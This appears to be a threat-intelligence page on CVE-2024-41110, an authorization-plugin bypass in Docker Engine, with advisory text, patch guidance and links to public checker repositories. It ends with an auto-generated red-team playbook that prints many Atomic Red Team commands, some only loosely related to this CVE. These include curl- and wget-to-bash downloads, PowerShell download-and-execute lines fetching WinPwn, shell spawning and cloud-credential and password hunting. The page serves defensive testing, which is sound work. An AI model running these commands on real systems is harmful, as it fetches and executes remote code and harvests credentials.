CVE-2024-41110
Overview
This vulnerability is an authorization bypass in the Docker Engine's API authorization plugin mechanism. It arises because the daemon forwards API requests or responses to authorization plugins without including the request body under certain conditions. The affected component is the Docker Engine's authorization plugin interface, which relies on the request and response body for access control decisions.
Vulnerability Description
Moby is an open-source project created by Docker for software containerization. A security vulnerability has been detected in certain versions of Docker Engine, which could allow an attacker to bypass authorization plugins (AuthZ) under specific circumstances. The base likelihood of this being exploited is low. Using a specially-crafted API request, an Engine API client could make the daemon forward the request or response to an authorization plugin without the body. In certain circumstances, the authorization plugin may allow a request which it would have otherwise denied if the body had been forwarded to it. A security issue was discovered In 2018, where an attacker could bypass AuthZ plugins using a specially crafted API request. This could lead to unauthorized actions, including privilege escalation. Although this issue was fixed in Docker Engine v18.09.1 in January 2019, the fix was not carried forward to later major versions, resulting in a regression. Anyone who depends on authorization plugins that introspect the request and/or response body to make access control decisions is potentially impacted. Docker EE v19.03.x and all versions of Mirantis Container Runtime are not vulnerable. docker-ce v27.1.1 containes patches to fix the vulnerability. Patches have also been merged into the master, 19.03, 20.0, 23.0, 24.0, 25.0, 26.0, and 26.1 release branches. If one is unable to upgrade immediately, avoid using AuthZ plugins and/or restrict access to the Docker API to trusted parties, following the principle of least privilege.
Impact
An attacker with access to the Docker Engine API and low privileges can bypass authorization plugins that rely on request or response bodies, potentially performing unauthorized actions including privilege escalation. Exploitation requires network access to the Docker API and low privilege authentication. The vulnerability has a CVSS vector indicating network attack with low complexity and privileges required but no user interaction, enabling full confidentiality, integrity, and availability compromise (CVSS 10).
Solution
Upgrade Docker Engine to docker-ce version 27.1.1 or later, which includes patches for this vulnerability. Patches have also been merged into the master and release branches 19.03, 20.0, 23.0, 24.0, 25.0, 26.0, and 26.1. Avoid using authorization plugins or restrict Docker API access to trusted parties if immediate upgrade is not possible. Detailed patch instructions and advisory information are available at https://github.com/moby/moby/security/advisories/GHSA-v23v-6jw2-98fq.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Docker Engine presents a significant security concern due to its potential to bypass authorization plugins, which are critical for enforcing access controls in containerized environments. This flaw arises from the way the Engine API client can manipulate API requests. Specifically, an attacker can craft a request that omits the body, leading the daemon to forward it to an authorization plugin without the necessary context for proper authorization checks. As a result, the plugin may inadvertently permit actions that would typically be denied if the complete request body were considered. This regression is particularly alarming given that a similar issue was previously addressed in 2019, highlighting a lapse in maintaining security standards across major versions.
The attack vectors for this vulnerability are primarily centered around the manipulation of API requests. An attacker with network access to the Docker API can exploit this flaw by sending specially crafted requests that lack the body content. This could allow unauthorized operations, such as executing commands or accessing sensitive data, depending on the permissions granted to the API client. Scenarios could include privilege escalation, where a user with limited access could gain elevated privileges by exploiting the authorization bypass. Although the likelihood of exploitation is assessed as low, the potential consequences of a successful attack warrant serious consideration, especially in environments where sensitive applications are deployed.
The real-world impact of this vulnerability can be profound, particularly for organizations relying on Docker for their container orchestration and management. Unauthorized access to containerized applications could lead to data breaches, service disruptions, or even full system compromise. The business risks associated with such incidents include reputational damage, regulatory penalties, and financial losses stemming from downtime or remediation efforts. Organizations that utilize authorization plugins for critical access control decisions are particularly at risk, as the failure to enforce proper authorization could expose them to significant threats.
To detect and mitigate this vulnerability, organizations should prioritize upgrading to the patched versions of Docker Engine. For those unable to immediately implement upgrades, it is crucial to avoid using authorization plugins that depend on request and response body inspection. Additionally, restricting access to the Docker API to trusted parties is essential, adhering to the principle of least privilege. Implementing network segmentation and robust firewall rules can further reduce the attack surface by limiting exposure to the Docker API. Regular security audits and monitoring for unusual API activity can also aid in early detection of potential exploitation attempts.
In conclusion, the vulnerability in the Docker Engine poses a serious threat to containerized environments, with the potential for unauthorized access and privilege escalation. While the likelihood of exploitation is low, the implications of a successful attack necessitate immediate attention from organizations utilizing Docker. By adopting proactive detection and mitigation strategies, businesses can safeguard their containerized applications and maintain the integrity of their security posture.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2024-41110, with new sightings emerging that indicate adversaries are increasingly probing Docker Engine environments for this authorization bypass vulnerability. Although the overall EPSS score remains moderate and stable, the sharp increase in telemetry from our sensors suggests that threat actors are actively testing or attempting to exploit this flaw in the wild. This shift elevates the operational risk, as the vulnerability’s critical severity combined with growing reconnaissance and exploitation attempts could lead to unauthorized privilege escalation within containerized infrastructures. Defenders should recognize that the threat landscape is evolving from theoretical risk toward practical exploitation attempts, warranting heightened vigilance despite the absence of widespread proof-of-concept exploits. The current environment reflects an increased likelihood that attackers may leverage this vulnerability as part of multi-stage intrusion campaigns targeting Docker deployments.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
vvpoglazov/cve-2024-41110-checker
|
vvpoglazov | 6 | 0 | 2024-07-25 | View |
|
PauloParoPP/CVE-2024-41110-SCAN
|
PauloParoPP | 0 | 0 | 2024-07-26 | View |
Threat Feed
6 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-273 | HTTP Response Smuggling |
32%
|
Medium | High | |
| CAPEC-33 | HTTP Request Smuggling |
32%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.